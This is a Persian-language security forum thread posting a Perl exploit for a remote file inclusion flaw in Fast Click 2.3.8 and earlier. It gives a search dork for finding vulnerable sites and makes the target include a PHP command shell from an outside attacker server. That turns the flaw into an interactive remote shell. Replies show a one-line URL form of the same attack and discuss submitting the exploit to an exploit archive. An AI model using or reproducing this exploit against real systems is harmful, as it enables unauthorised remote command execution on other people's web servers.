اطلاعیه

Collapse
No announcement yet.

Fast Click <= 2.3.8 Remote File Inclusion exploit

Collapse
X
 
  • Filter
  • زمان
  • Show
Clear All
new posts

  • Fast Click <= 2.3.8 Remote File Inclusion exploit

    توسط تيم امنيتی آريا


    کد PHP:
    # The different versions from 2.3.8, are also remotely exploitable.
    #   The included filename needs to be changed to match the request.
    #   /str0ke

    #!/usr/bin/perl
    ##
    # Fast Click <= 2.3.8 Remote File Inclusion exploit
    # Bug discovered and cod3d by R@1D3N (amin emami)
    #Greet:Outlaw - Aura - Dltrp - Cl0wn - B3HZAD - sm0k3r - Exploitercode - Str0ke and all persian Cyber team
    #http://www.aria-security.net
    #Dork:inurl:"fclick.php?fid"
    # usage:
    # perl fc.pl <target> <cmd shell location> <cmd shell variable>
    # perl fc.pl http://target.com/fclick/ http://target.com/cmd.gif cmd
    # cmd shell example: <?system($cmd);?>
    # cmd shell variable: ($_GET[cmd]);

    use LWP::UserAgent;

    $Path = $ARGV[0];
    $Pathtocmd = $ARGV[1];
    $cmdv = $ARGV[2];

    if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}

    head();

    while()
    {
          print "[shell] \$";
    while(<STDIN>)
          {
                  $cmd=$_;
                  chomp($cmd);

    $xpl = LWP::UserAgent->new() or die;
    $req = HTTP::Request->new(GET =>$Path.'show.php?path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";

    $res = $xpl->request($req);
    $return = $res->content;
    $return =~ tr/[\n]/[ê]/;

    if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}

    elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
          {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
    elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}

    if($return =~ /(.*)/)

    {
          $finreturn = $1;
          $finreturn=~ tr/[ê]/[\n]/;
          print "\r\n$finreturn\n\r";
          last;
    }

    else {print "[shell] \$";}}}last;

    sub head()
     {
     print "\n============================================================================\r\n";
     print " Fast Click <= 2.3.8 Remote File Inclusion exploit\r\n";
     print "============================================================================\r\n";
     }
    sub usage()
     {
     head();
     print " Usage: perl fc.pl <target> <cmd shell location> <cmd shell variable>\r\n\n";
     print " <Site> - Full path to Fastclick ex: http://www.site.com/fclick/ \r\n";
     print " <cmd shell> - Path to cmd Shell e.g http://evilserver/cmd.gif \r\n";
     print " <cmd variable> - Command variable used in php shell \r\n";
     print "============================================================================\r\n";
     print "                           bug discovered by RAYD3N \r\n";
     print " www.Aria-security.net/Forums/ \r\n";
     print "============================================================================\r\n";
     exit();
     }

  • #2
    به جای این همه کدبازی ....
    کافی نبود به این شکل میذاشتید :
    show.php?path=evilcod.gif?cmd=ls
    و همین و بس .

    البته از دیدی واسه دیدن و راحتی از منظری این درسته و مفید /...
    Last edited by ; 05-04-2006, 02:02 AM.

    Comment


    • #3
      دليل خاصی نداشت ... خواستيم آسيب پذيری تنها نباشه اکسپلويتش هم بنويسيم

      Comment


      • #4
        دقیقا برای اکسپلویت بود . فکر نکنم milw0rm و ... اکسپلویت این شکلی قبول کنن .
        show.php?path=evilcod.gif?cmd=ls
        شاید هم قبول کنن ولی اکسپلویت کلاس کار رو میبره بالا . ;)

        Comment


        • #5
          چرا ميلورم هم به صورت آسيب پذيری و هم به صورت اکسپلويت قبول ميکنه که ما به صورت اکسپلويت ثبت کرديم چون اکثر دوستان ازcmd.gif استفاده ميکنند گفتيم اگر در محيط cmdباشه بهتره وگر نه دليل ديگه اي نداشت

          Comment

          Working...
          X